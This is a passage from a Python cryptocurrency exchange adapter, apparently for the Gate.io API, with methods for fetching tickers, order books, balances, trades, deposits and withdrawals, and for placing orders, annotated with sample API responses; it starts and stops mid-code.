self.safe_string(entry, 'address')\n tag = self.safe_string(entry, 'payment_id')\n tagLength = len(tag)\n tag = tag if tagLength else None\n result[network] = {\n 'info': entry,\n 'code': code,\n 'address': address,\n 'tag': tag,\n }\n return result\n\n def fetch_deposit_address(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n response = self.privateWalletGetDepositAddress(self.extend(request, params))\n #\n # {\n # \"currency\": \"XRP\",\n # \"address\": \"rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d 391331007\",\n # \"multichain_addresses\": [\n # {\n # \"chain\": \"XRP\",\n # \"address\": \"rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d\",\n # \"payment_id\": \"391331007\",\n # \"payment_name\": \"Tag\",\n # \"obtain_failed\": 0\n # }\n # ]\n # }\n #\n currencyId = self.safe_string(response, 'currency')\n code = self.safe_currency_code(currencyId)\n addressField = self.safe_string(response, 'address')\n tag = None\n address = None\n if addressField.find(' ') >= 0:\n splitted = addressField.split(' ')\n address = splitted[0]\n tag = splitted[1]\n else:\n address = addressField\n return {\n 'info': response,\n 'code': code,\n 'address': address,\n 'tag': tag,\n 'network': None,\n }\n\n def fetch_trading_fees(self, params={}):\n self.load_markets()\n response = self.privateWalletGetFee(params)\n #\n # {\n # \"user_id\": 1486602,\n # \"taker_fee\": \"0.002\",\n # \"maker_fee\": \"0.002\",\n # \"gt_discount\": True,\n # \"gt_taker_fee\": \"0.0015\",\n # \"gt_maker_fee\": \"0.0015\",\n # \"loan_fee\": \"0.18\",\n # \"point_type\": \"0\",\n # \"futures_taker_fee\": \"0.0005\",\n # \"futures_maker_fee\": \"0\"\n # }\n #\n result = {}\n taker = self.safe_number(response, 'taker_fee')\n maker = self.safe_number(response, 'maker_fee')\n for i in range(0, len(self.symbols)):\n symbol = self.symbols[i]\n result[symbol] = {\n 'maker': maker,\n 'taker': taker,\n 'info': response,\n 'symbol': symbol,\n }\n return result\n\n def fetch_funding_fees(self, params={}):\n self.load_markets()\n response = self.privateWalletGetWithdrawStatus(params)\n #\n # {\n # \"currency\": \"MTN\",\n # \"name\": \"Medicalchain\",\n # \"name_cn\": \"Medicalchain\",\n # \"deposit\": \"0\",\n # \"withdraw_percent\": \"0%\",\n # \"withdraw_fix\": \"900\",\n # \"withdraw_day_limit\": \"500000\",\n # \"withdraw_day_limit_remain\": \"500000\",\n # \"withdraw_amount_mini\": \"900.1\",\n # \"withdraw_eachtime_limit\": \"90000000000\",\n # \"withdraw_fix_on_chains\": {\n # \"ETH\": \"900\"\n # }\n # }\n #\n withdrawFees = {}\n for i in range(0, len(response)):\n entry = response[i]\n currencyId = self.safe_string(entry, 'currency')\n code = self.safe_currency_code(currencyId)\n withdrawFees[code] = {}\n withdrawFix = self.safe_value(entry, 'withdraw_fix_on_chains')\n if withdrawFix is None:\n withdrawFix = {}\n withdrawFix[code] = self.safe_number(entry, 'withdraw_fix')\n keys = list(withdrawFix.keys())\n for i in range(0, len(keys)):\n key = keys[i]\n withdrawFees[code][key] = self.parse_number(withdrawFix[key])\n return {\n 'info': response,\n 'withdraw': withdrawFees,\n 'deposit': {},\n }\n\n def fetch_funding_history(self, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n # defaultType = 'future'\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchFundingHistory() requires the argument \"symbol\"')\n market = self.market(symbol)\n request = self.prepare_request(market)\n request['type'] = 'fund' # 'dnw' 'pnl' 'fee' 'refr' 'fund' 'point_dnw' 'point_fee' 'point_refr'\n if since is not None:\n request['from'] = since\n if limit is not None:\n request['limit'] = limit\n method = self.get_supported_mapping(market['type'], {\n 'swap': 'privateFuturesGetSettleAccountBook',\n 'futures': 'privateDeliveryGetSettleAccountBook',\n })\n response = getattr(self, method)(self.extend(request, params))\n result = []\n for i in range(0, len(response)):\n entry = response[i]\n timestamp = self.safe_timestamp(entry, 'time')\n result.append({\n 'info': entry,\n 'symbol': symbol,\n 'code': self.safe_currency_code(self.safe_string(entry, 'text')),\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'id': None,\n 'amount': self.safe_number(entry, 'change'),\n })\n return result\n\n def fetch_order_book(self, symbol, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n #\n # request = {\n # 'currency_pair': market['id'],\n # 'interval': '0', # depth, 0 means no aggregation is applied, default to 0\n # 'limit': limit, # maximum number of order depth data in asks or bids\n # 'with_id': True, # return order book ID\n # }\n #\n request = self.prepare_request(market)\n spot = market['spot']\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'publicSpotGetOrderBook',\n # 'margin': 'publicMarginGetOrderBook',\n 'swap': 'publicFuturesGetSettleOrderBook',\n 'futures': 'publicDeliveryGetSettleOrderBook',\n })\n if limit is not None:\n request['limit'] = limit # default 10, max 100\n response = getattr(self, method)(self.extend(request, params))\n #\n # SPOT\n #\n # {\n # \"current\": 1634345973275,\n # \"update\": 1634345973271,\n # \"asks\": [\n # [\"2.2241\",\"12449.827\"],\n # [\"2.2242\",\"200\"],\n # [\"2.2244\",\"826.931\"],\n # [\"2.2248\",\"3876.107\"],\n # [\"2.225\",\"2377.252\"],\n # [\"2.22509\",\"439.484\"],\n # [\"2.2251\",\"1489.313\"],\n # [\"2.2253\",\"714.582\"],\n # [\"2.2254\",\"1349.784\"],\n # [\"2.2256\",\"234.701\"]],\n # \"bids\":[\n # [\"2.2236\",\"32.465\"],\n # [\"2.2232\",\"243.983\"],\n # [\"2.2231\",\"32.207\"],\n # [\"2.223\",\"449.827\"],\n # [\"2.2228\",\"7.918\"],\n # [\"2.2227\",\"12703.482\"],\n # [\"2.2226\",\"143.033\"],\n # [\"2.2225\",\"143.027\"],\n # [\"2.2224\",\"1369.352\"],\n # [\"2.2223\",\"756.063\"]\n # ]\n # }\n #\n # Perpetual Swap\n #\n # {\n # \"current\": 1634350208.745,\n # \"asks\": [\n # {\"s\":24909,\"p\": \"61264.8\"},\n # {\"s\":81,\"p\": \"61266.6\"},\n # {\"s\":2000,\"p\": \"61267.6\"},\n # {\"s\":490,\"p\": \"61270.2\"},\n # {\"s\":12,\"p\": \"61270.4\"},\n # {\"s\":11782,\"p\": \"61273.2\"},\n # {\"s\":14666,\"p\": \"61273.3\"},\n # {\"s\":22541,\"p\": \"61273.4\"},\n # {\"s\":33,\"p\": \"61273.6\"},\n # {\"s\":11980,\"p\": \"61274.5\"}\n # ],\n # \"bids\": [\n # {\"s\":41844,\"p\": \"61264.7\"},\n # {\"s\":13783,\"p\": \"61263.3\"},\n # {\"s\":1143,\"p\": \"61259.8\"},\n # {\"s\":81,\"p\": \"61258.7\"},\n # {\"s\":2471,\"p\": \"61257.8\"},\n # {\"s\":2471,\"p\": \"61257.7\"},\n # {\"s\":2471,\"p\": \"61256.5\"},\n # {\"s\":3,\"p\": \"61254.2\"},\n # {\"s\":114,\"p\": \"61252.4\"},\n # {\"s\":14372,\"p\": \"61248.6\"}\n # ],\n # \"update\": 1634350208.724\n # }\n #\n timestamp = self.safe_integer(response, 'current')\n if not spot:\n timestamp = timestamp * 1000\n priceKey = 0 if spot else 'p'\n amountKey = 1 if spot else 's'\n return self.parse_order_book(response, symbol, timestamp, 'bids', 'asks', priceKey, amountKey)\n\n def fetch_ticker(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = self.prepare_request(market)\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'publicSpotGetTickers',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'publicFuturesGetSettleTickers',\n 'futures': 'publicDeliveryGetSettleTickers',\n })\n response = getattr(self, method)(self.extend(request, params))\n ticker = self.safe_value(response, 0)\n return self.parse_ticker(ticker, market)\n\n def parse_ticker(self, ticker, market=None):\n #\n # SPOT\n #\n # {\n # \"currency_pair\": \"KFC_USDT\",\n # \"last\": \"7.255\",\n # \"lowest_ask\": \"7.298\",\n # \"highest_bid\": \"7.218\",\n # \"change_percentage\": \"-1.18\",\n # \"base_volume\": \"1219.053687865\",\n # \"quote_volume\": \"8807.40299875455\",\n # \"high_24h\": \"7.262\",\n # \"low_24h\": \"7.095\"\n # }\n #\n # LINEAR/DELIVERY\n #\n # {\n # \"contract\": \"BTC_USDT\",\n # \"last\": \"6432\",\n # \"low_24h\": \"6278\",\n # \"high_24h\": \"6790\",\n # \"change_percentage\": \"4.43\",\n # \"total_size\": \"32323904\",\n # \"volume_24h\": \"184040233284\",\n # \"volume_24h_btc\": \"28613220\",\n # \"volume_24h_usd\": \"184040233284\",\n # \"volume_24h_base\": \"28613220\",\n # \"volume_24h_quote\": \"184040233284\",\n # \"volume_24h_settle\": \"28613220\",\n # \"mark_price\": \"6534\",\n # \"funding_rate\": \"0.0001\",\n # \"funding_rate_indicative\": \"0.0001\",\n # \"index_price\": \"6531\"\n # }\n #\n marketId = self.safe_string_2(ticker, 'currency_pair', 'contract')\n symbol = self.safe_symbol(marketId, market)\n last = self.safe_number(ticker, 'last')\n ask = self.safe_number(ticker, 'lowest_ask')\n bid = self.safe_number(ticker, 'highest_bid')\n high = self.safe_number(ticker, 'high_24h')\n low = self.safe_number(ticker, 'low_24h')\n baseVolume = self.safe_number(ticker, 'base_volume', 'volume_24h_base')\n quoteVolume = self.safe_number(ticker, 'quote_volume', 'volume_24h_quote')\n percentage = self.safe_number(ticker, 'change_percentage')\n return self.safe_ticker({\n 'symbol': symbol,\n 'timestamp': None,\n 'datetime': None,\n 'high': high,\n 'low': low,\n 'bid': bid,\n 'bidVolume': None,\n 'ask': ask,\n 'askVolume': None,\n 'vwap': None,\n 'open': None,\n 'close': last,\n 'last': last,\n 'previousClose': None,\n 'change': None,\n 'percentage': percentage,\n 'average': None,\n 'baseVolume': baseVolume,\n 'quoteVolume': quoteVolume,\n 'info': ticker,\n }, market)\n\n def fetch_tickers(self, symbols=None, params={}):\n self.load_markets()\n defaultType = self.safe_string_2(self.options, 'fetchTickers', 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n params = self.omit(params, 'type')\n method = self.get_supported_mapping(type, {\n 'spot': 'publicSpotGetTickers',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'publicFuturesGetSettleTickers',\n 'futures': 'publicDeliveryGetSettleTickers',\n })\n request = {}\n futures = type == 'futures'\n swap = type == 'swap'\n if (swap or futures) and not params['settle']:\n request['settle'] = 'usdt' if swap else 'btc'\n response = getattr(self, method)(self.extend(request, params))\n return self.parse_tickers(response, symbols)\n\n def fetch_balance(self, params={}):\n # :param params.type: spot, margin, crossMargin, swap or future\n # :param params.settle: Settle currency(usdt or btc) for perpetual swap and futures\n self.load_markets()\n defaultType = self.safe_string_2(self.options, 'fetchBalance', 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n params = self.omit(params, 'type')\n swap = type == 'swap'\n futures = type == 'futures'\n method = self.get_supported_mapping(type, {\n 'spot': 'privateSpotGetAccounts',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'privateFuturesGetSettleAccounts',\n 'futures': 'privateDeliveryGetSettleAccounts',\n })\n request = {}\n response = []\n if swap or futures:\n defaultSettle = 'usdt' if swap else 'btc'\n request['settle'] = self.safe_string(params, 'settle', defaultSettle)\n response_item = getattr(self, method)(self.extend(request, params))\n response = [response_item]\n else:\n response = getattr(self, method)(self.extend(request, params))\n # SPOT\n # [\n # {\n # \"currency\": \"DBC\",\n # \"available\": \"0\",\n # \"locked\": \"0\"\n # },\n # ...\n # ]\n #\n # Perpetual Swap\n # {\n # order_margin: \"0\",\n # point: \"0\",\n # bonus: \"0\",\n # history: {\n # dnw: \"2.1321\",\n # pnl: \"11.5351\",\n # refr: \"0\",\n # point_fee: \"0\",\n # fund: \"-0.32340576684\",\n # bonus_dnw: \"0\",\n # point_refr: \"0\",\n # bonus_offset: \"0\",\n # fee: \"-0.20132775\",\n # point_dnw: \"0\",\n # },\n # unrealised_pnl: \"13.315100000006\",\n # total: \"12.51345151332\",\n # available: \"0\",\n # in_dual_mode: False,\n # currency: \"USDT\",\n # position_margin: \"12.51345151332\",\n # user: \"6333333\",\n # }\n #\n # Delivery Future\n # {\n # order_margin: \"0\",\n # point: \"0\",\n # history: {\n # dnw: \"1\",\n # pnl: \"0\",\n # refr: \"0\",\n # point_fee: \"0\",\n # point_dnw: \"0\",\n # settle: \"0\",\n # settle_fee: \"0\",\n # point_refr: \"0\",\n # fee: \"0\",\n # },\n # unrealised_pnl: \"0\",\n # total: \"1\",\n # available: \"1\",\n # currency: \"USDT\",\n # position_margin: \"0\",\n # user: \"6333333\",\n # }\n result = {}\n for i in range(0, len(response)):\n entry = response[i]\n account = self.account()\n currencyId = self.safe_string(entry, 'currency')\n code = self.safe_currency_code(currencyId)\n account['used'] = self.safe_string_2(entry, 'locked', 'position_margin')\n account['free'] = self.safe_string(entry, 'available')\n result[code] = account\n return self.parse_balance(result)\n\n def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n price = self.safe_string(params, 'price')\n request = self.prepare_request(market)\n request['interval'] = self.timeframes[timeframe]\n method = 'publicSpotGetCandlesticks'\n if market['contract']:\n if market['futures']:\n method = 'publicDeliveryGetSettleCandlesticks'\n elif market['swap']:\n method = 'publicFuturesGetSettleCandlesticks'\n isMark = (price == 'mark')\n isIndex = (price == 'index')\n if isMark or isIndex:\n request['contract'] = price + '_' + market['id']\n params = self.omit(params, 'price')\n if since is None:\n if limit is not None:\n request['limit'] = limit\n else:\n request['from'] = int(since / 1000)\n if limit is not None:\n request['to'] = self.sum(request['from'], limit * self.parse_timeframe(timeframe) - 1)\n response = getattr(self, method)(self.extend(request, params))\n return self.parse_ohlcvs(response, market, timeframe, since, limit)\n\n def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n request = {\n 'price': 'mark',\n }\n return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))\n\n def fetch_funding_rate_history(self, symbol=None, limit=None, since=None, params={}):\n self.load_markets()\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchFundingRateHistory() requires a symbol argument')\n market = self.market(symbol)\n request = {\n 'contract': market['id'],\n 'settle': market['quote'].lower(),\n }\n if limit is not None:\n request['limit'] = limit\n method = 'publicFuturesGetSettleFundingRate'\n response = getattr(self, method)(self.extend(request, params))\n #\n # {\n # \"r\": \"0.00063521\",\n # \"t\": \"1621267200000\",\n # }\n #\n rates = []\n for i in range(0, len(response)):\n entry = response[i]\n timestamp = self.safe_timestamp(entry, 't')\n rates.append({\n 'info': entry,\n 'symbol': symbol,\n 'fundingRate': self.safe_number(entry, 'r'),\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n })\n return self.sort_by(rates, 'timestamp')\n\n def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n request = {\n 'price': 'index',\n }\n return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))\n\n def parse_ohlcv(self, ohlcv, market=None):\n #\n # Spot market candles\n #\n # [\n # \"1626163200\", # Unix timestamp in seconds\n # \"346711.933138181617\", # Trading volume\n # \"33165.23\", # Close price\n # \"33260\", # Highest price\n # \"33117.6\", # Lowest price\n # \"33184.47\" # Open price\n # ]\n #\n # Mark and Index price candles\n #\n # {\n # \"t\":1632873600, # Unix timestamp in seconds\n # \"o\": \"41025\", # Open price\n # \"h\": \"41882.17\", # Highest price\n # \"c\": \"41776.92\", # Close price\n # \"l\": \"40783.94\" # Lowest price\n # }\n #\n if isinstance(ohlcv, list):\n return [\n self.safe_timestamp(ohlcv, 0), # unix timestamp in seconds\n self.safe_number(ohlcv, 5), # open price\n self.safe_number(ohlcv, 3), # highest price\n self.safe_number(ohlcv, 4), # lowest price\n self.safe_number(ohlcv, 2), # close price\n self.safe_number(ohlcv, 1), # trading volume\n ]\n else:\n # Mark and Index price candles\n return [\n self.safe_timestamp(ohlcv, 't'), # unix timestamp in seconds\n self.safe_number(ohlcv, 'o'), # open price\n self.safe_number(ohlcv, 'h'), # highest price\n self.safe_number(ohlcv, 'l'), # lowest price\n self.safe_number(ohlcv, 'c'), # close price\n self.safe_number(ohlcv, 'v'), # trading volume, None for mark or index price\n ]\n\n def fetch_trades(self, symbol, since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n #\n # spot\n #\n # request = {\n # 'currency_pair': market['id'],\n # 'limit': limit, # maximum number of records to be returned in a single list\n # 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results\n # 'reverse': False, # True to retrieve records where id is smaller than the specified last_id, False to retrieve records where id is larger than the specified last_id\n # }\n #\n # swap, futures\n #\n # request = {\n # 'settle': market['settleId'],\n # 'contract': market['id'],\n # 'limit': limit, # maximum number of records to be returned in a single list\n # 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results\n # 'from': since / 1000), # starting time in seconds, if not specified, to and limit will be used to limit response items\n # 'to': self.seconds(), # end time in seconds, default to current time\n # }\n #\n request = self.prepare_request(market)\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'publicSpotGetTrades',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'publicFuturesGetSettleTrades',\n 'futures': 'publicDeliveryGetSettleTrades',\n })\n if limit is not None:\n request['limit'] = limit # default 100, max 1000\n if since is not None and (market['contract']):\n request['from'] = int(since / 1000)\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # [\n # {\n # id: \"1852958144\",\n # create_time: \"1634673259\",\n # create_time_ms: \"1634673259378.105000\",\n # currency_pair: \"ADA_USDT\",\n # side: \"sell\",\n # amount: \"307.078\",\n # price: \"2.104\",\n # }\n # ]\n #\n # perpetual swap\n #\n # [\n # {\n # size: \"2\",\n # id: \"2522911\",\n # create_time_ms: \"1634673380.182\",\n # create_time: \"1634673380.182\",\n # contract: \"ADA_USDT\",\n # price: \"2.10486\",\n # }\n # ]\n #\n return self.parse_trades(response, market, since, limit)\n\n def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n #\n # request = {\n # 'currency_pair': market['id'],\n # # 'limit': limit,\n # # 'page': 0,\n # # 'order_id': 'Order ID',\n # # 'account': 'spot', # default to spot and margin account if not specified, set to cross_margin to operate against margin account\n # # 'from': since, # default to 7 days before current time\n # # 'to': self.milliseconds(), # default to current time\n # }\n #\n request = self.prepare_request(market)\n if limit is not None:\n request['limit'] = limit # default 100, max 1000\n if since is not None:\n request['from'] = int(since / 1000)\n # request['to'] = since + 7 * 24 * 60 * 60\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotGetMyTrades',\n # 'margin': 'publicMarginGetCurrencyPairs',\n 'swap': 'privateFuturesGetSettleMyTrades',\n 'futures': 'privateDeliveryGetSettleMyTrades',\n })\n response = getattr(self, method)(self.extend(request, params))\n # SPOT\n # [{\n # id: \"1851927191\",\n # create_time: \"1634333360\",\n # create_time_ms: \"1634333360359.901000\",\n # currency_pair: \"BTC_USDT\",\n # side: \"buy\",\n # role: \"taker\",\n # amount: \"0.0001\",\n # price: \"62547.51\",\n # order_id: \"93475897349\",\n # fee: \"2e-07\",\n # fee_currency: \"BTC\",\n # point_fee: \"0\",\n # gt_fee: \"0\",\n # }]\n # Perpetual Swap\n # [{\n # size: \"-13\",\n # order_id: \"79723658958\",\n # id: \"47612669\",\n # role: \"taker\",\n # create_time: \"1634600263.326\",\n # contract: \"BTC_USDT\",\n # price: \"61987.8\",\n # }]\n return self.parse_trades(response, market, since, limit)\n\n def parse_trade(self, trade, market=None):\n #\n # public\n #\n # {\n # \"id\": \"1334253759\",\n # \"create_time\": \"1626342738\",\n # \"create_time_ms\": \"1626342738331.497000\",\n # \"currency_pair\": \"BTC_USDT\",\n # \"side\": \"sell\",\n # \"amount\": \"0.0022\",\n # \"price\": \"32452.16\"\n # }\n #\n # private\n #\n # {\n # \"id\": \"218087755\",\n # \"create_time\": \"1578958740\",\n # \"create_time_ms\": \"1578958740122.710000\",\n # \"currency_pair\": \"BTC_USDT\",\n # \"side\": \"sell\",\n # \"role\": \"taker\",\n # \"amount\": \"0.0004\",\n # \"price\": \"8112.77\",\n # \"order_id\": \"8445563839\",\n # \"fee\": \"0.006490216\",\n # \"fee_currency\": \"USDT\",\n # \"point_fee\": \"0\",\n # \"gt_fee\": \"0\"\n # }\n #\n id = self.safe_string(trade, 'id')\n timestampStringContract = self.safe_string(trade, 'create_time')\n timestampString = self.safe_string_2(trade, 'create_time_ms', 'time', timestampStringContract)\n timestamp = None\n if timestampString.find('.') > 0:\n milliseconds = timestampString.split('.')\n timestamp = int(milliseconds[0])\n if market['contract']:\n timestamp = timestamp * 1000\n marketId = self.safe_string_2(trade, 'currency_pair', 'contract')\n symbol = self.safe_symbol(marketId, market)\n amountString = self.safe_string_2(trade, 'amount', 'size')\n priceString = self.safe_string(trade, 'price')\n costString = Precise.string_abs(Precise.string_mul(amountString, priceString))\n price = self.parse_number(priceString)\n cost = self.parse_number(costString)\n contractSide = 'sell' if Precise.string_lt(amountString, '0') else 'buy'\n amountString = Precise.string_abs(amountString)\n amount = self.parse_number(amountString)\n side = self.safe_string(trade, 'side', contractSide)\n orderId = self.safe_string(trade, 'order_id')\n gtFee = self.safe_string(trade, 'gt_fee')\n feeCurrency = None\n feeCost = None\n if gtFee == '0':\n feeCurrency = self.safe_string(trade, 'fee_currency')\n feeCost = self.safe_number(trade, 'fee')\n else:\n feeCurrency = 'GT'\n feeCost = self.parse_number(gtFee)\n fee = {\n 'cost': feeCost,\n 'currency': feeCurrency,\n }\n takerOrMaker = self.safe_string(trade, 'role')\n return {\n 'info': trade,\n 'id': id,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'symbol': symbol,\n 'order': orderId,\n 'type': None,\n 'side': side,\n 'takerOrMaker': takerOrMaker,\n 'price': price,\n 'amount': amount,\n 'cost': cost,\n 'fee': fee,\n }\n\n def fetch_deposits(self, code=None, since=None, limit=None, params={}):\n self.load_markets()\n request = {}\n currency = None\n if code is not None:\n currency = self.currency(code)\n request['currency'] = currency['id']\n if limit is not None:\n request['limit'] = limit\n if since is not None:\n request['from'] = int(since / 1000)\n request['to'] = since + 30 * 24 * 60 * 60\n response = self.privateWalletGetDeposits(self.extend(request, params))\n return self.parse_transactions(response, currency)\n\n def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):\n self.load_markets()\n request = {}\n currency = None\n if code is not None:\n currency = self.currency(code)\n request['currency'] = currency['id']\n if limit is not None:\n request['limit'] = limit\n if since is not None:\n request['from'] = int(since / 1000)\n request['to'] = since + 30 * 24 * 60 * 60\n response = self.privateWalletGetWithdrawals(self.extend(request, params))\n return self.parse_transactions(response, currency)\n\n def withdraw(self, code, amount, address, tag=None, params={}):\n tag, params = self.handle_withdraw_tag_and_params(tag, params)\n self.check_address(address)\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'address': address,\n 'amount': self.currency_to_precision(code, amount),\n }\n if tag is not None:\n request['memo'] = tag\n networks = self.safe_value(self.options, 'networks', {})\n network = self.safe_string_upper(params, 'network') # self line allows the user to specify either ERC20 or ETH\n network = self.safe_string_lower(networks, network, network) # handle ETH>ERC20 alias\n if network is not None:\n request['chain'] = network\n params = self.omit(params, 'network')\n response = self.privateWithdrawalsPost(self.extend(request, params))\n #\n # {\n # \"id\": \"w13389675\",\n # \"currency\": \"USDT\",\n # \"amount\": \"50\",\n # \"address\": \"TUu2rLFrmzUodiWfYki7QCNtv1akL682p1\",\n # \"memo\": null\n # }\n #\n currencyId = self.safe_string(response, 'currency')\n id = self.safe_string(response, 'id')\n return {\n 'info': response,\n 'id': id,\n 'code': self.safe_currency_code(currencyId),\n 'amount': self.safe_number(response, 'amount'),\n 'address': self.safe_string(response, 'address'),\n 'tag': self.safe_string(response, 'memo'),\n }\n\n def parse_transaction_status(self, status):\n statuses = {\n 'PEND': 'pending',\n 'REQUEST': 'pending',\n 'DMOVE': 'pending',\n 'CANCEL': 'failed',\n 'DONE': 'ok',\n }\n return self.safe_string(statuses, status, status)\n\n def parse_transaction_type(self, type):\n types = {\n 'd': 'deposit',\n 'w': 'withdrawal',\n }\n return self.safe_string(types, type, type)\n\n def parse_transaction(self, transaction, currency=None):\n #\n # deposits\n #\n # {\n # \"id\": \"d33361395\",\n # \"currency\": \"USDT_TRX\",\n # \"address\": \"TErdnxenuLtXfnMafLbfappYdHtnXQ5U4z\",\n # \"amount\": \"100\",\n # \"txid\": \"ae9374de34e558562fe18cbb1bf9ab4d9eb8aa7669d65541c9fa2a532c1474a0\",\n # \"timestamp\": \"1626345819\",\n # \"status\": \"DONE\",\n # \"memo\": \"\"\n # }\n #\n # withdrawals\n id = self.safe_string(transaction, 'id')\n type = None\n if id is not None:\n type = self.parse_transaction_type(id[0])\n currencyId = self.safe_string(transaction, 'currency')\n code = self.safe_currency_code(currencyId)\n amount = self.safe_number(transaction, 'amount')\n txid = self.safe_string(transaction, 'txid')\n rawStatus = self.safe_string(transaction, 'status')\n status = self.parse_transaction_status(rawStatus)\n address = self.safe_string(transaction, 'address')\n fee = self.safe_number(transaction, 'fee')\n tag = self.safe_string(transaction, 'memo')\n if tag == '':\n tag = None\n timestamp = self.safe_timestamp(transaction, 'timestamp')\n return {\n 'info': transaction,\n 'id': id,\n 'txid': txid,\n 'currency': code,\n 'amount': amount,\n 'address': address,\n 'tag': tag,\n 'status': status,\n 'type': type,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'fee': fee,\n }\n\n def create_order(self, symbol, type, side, amount, price=None, params={}):\n #\n # :param(str) symbol: base/quote currency pair\n # :param(str) type: Order type(limit, market, ...)\n # :param(str) side: buy or sell\n # :param(number) amount: Amount of base currency ordered\n # :param(number) price: Price of the base currency using quote currency\n # :param(dict) params:\n # - type: market type(spot, futures, ...)\n # - reduceOnly\n self.load_markets()\n market = self.market(symbol)\n defaultType = self.safe_string_2(self.options, 'createOrder', 'defaultType', 'spot')\n marketType = self.safe_string(params, 'type', defaultType)\n contract = market['contract']\n request = self.prepare_request(market)\n reduceOnly = self.safe_value(params, 'reduceOnly')\n params = self.omit(params, 'reduceOnly')\n if reduceOnly is not None:\n if not contract:\n raise InvalidOrder(self.id + ' createOrder() does not support reduceOnly for ' + marketType + ' orders, reduceOnly orders are supported for futures and perpetuals only')\n request['reduce_only'] = reduceOnly\n if contract:\n if side == 'sell':\n amount = 0 - amount\n request['size'] = self.parse_number(self.amount_to_precision(symbol, amount))\n else:\n request['side'] = side\n request['type'] = type\n request['amount'] = self.amount_to_precision(symbol, amount)\n request['account'] = marketType\n # if margin:\n # if entering trade:\n # request['auto_borrow'] = True\n # elif exiting trade:\n # request['auto_repay'] = True\n # }\n # }\n if type == 'limit':\n if not price:\n raise ArgumentsRequired('Argument price is required for ' + self.id + '.createOrder for limit orders')\n request['price'] = self.price_to_precision(symbol, price)\n elif (type == 'market') and contract:\n request['tif'] = 'ioc'\n request['price'] = 0\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotPostOrders',\n # 'margin': 'privateSpotPostOrders',\n 'swap': 'privateFuturesPostSettleOrders',\n 'future': 'privateDeliveryPostSettleOrders',\n })\n response = getattr(self, method)(self.extend(request, params))\n return self.parse_order(response, market)\n\n def parse_order_status(self, status):\n statuses = {\n 'filled': 'closed',\n 'cancelled': 'canceled',\n 'liquidated': 'closed',\n }\n return self.safe_string(statuses, status, status)\n\n def parse_order(self, order, market=None):\n #\n # createOrder, spot\n #\n # {\n # \"id\": \"62364648575\",\n # \"text\": \"apiv4\",\n # \"create_time\": \"1626354834\",\n # \"update_time\": \"1626354834\",\n # \"create_time_ms\": \"1626354833544\",\n # \"update_time_ms\": \"1626354833544\",\n # \"status\": \"open\",\n # \"currency_pair\": \"BTC_USDT\",\n # \"type\": \"limit\",\n # \"account\": \"spot\",\n # \"side\": \"buy\",\n # \"amount\": \"0.0001\",\n # \"price\": \"30000\",\n # \"time_in_force\": \"gtc\",\n # \"iceberg\": \"0\",\n # \"left\": \"0.0001\",\n # \"fill_price\": \"0\",\n # \"filled_total\": \"0\",\n # \"fee\": \"0\",\n # \"fee_currency\": \"BTC\",\n # \"point_fee\": \"0\",\n # \"gt_fee\": \"0\",\n # \"gt_discount\": True,\n # \"rebated_fee\": \"0\",\n # \"rebated_fee_currency\": \"USDT\"\n # }\n #\n #\n id = self.safe_string(order, 'id')\n marketId = self.safe_string_2(order, 'currency_pair', 'contract')\n symbol = self.safe_symbol(marketId, market)\n timestamp = self.safe_timestamp(order, 'create_time')\n timestamp = self.safe_integer(order, 'create_time_ms', timestamp)\n lastTradeTimestamp = self.safe_timestamp(order, 'update_time')\n lastTradeTimestamp = self.safe_integer(order, 'update_time_ms', lastTradeTimestamp)\n amountRaw = self.safe_string_2(order, 'amount', 'size')\n amount = Precise.string_abs(amountRaw)\n price = self.safe_string(order, 'price')\n average = self.safe_string(order, 'fill_price')\n remaining = self.safe_string(order, 'left')\n cost = self.safe_string(order, 'filled_total') # same as filled_price\n rawStatus = None\n side = None\n contract = self.safe_value(market, 'contract')\n if contract:\n side = 'buy' if Precise.string_gt(amountRaw, '0') else 'sell'\n rawStatus = self.safe_string(order, 'finish_as', 'open')\n else:\n # open, closed, cancelled - almost already ccxt unified!\n rawStatus = self.safe_string(order, 'status')\n side = self.safe_string(order, 'side')\n status = self.parse_order_status(rawStatus)\n type = self.safe_string(order, 'type')\n timeInForce = self.safe_string_upper_2(order, 'time_in_force', 'tif')\n fees = []\n gtFee = self.safe_number(order, 'gt_fee')\n if gtFee:\n fees.append({\n 'currency': 'GT',\n 'cost': gtFee,\n })\n fee = self.safe_number(order, 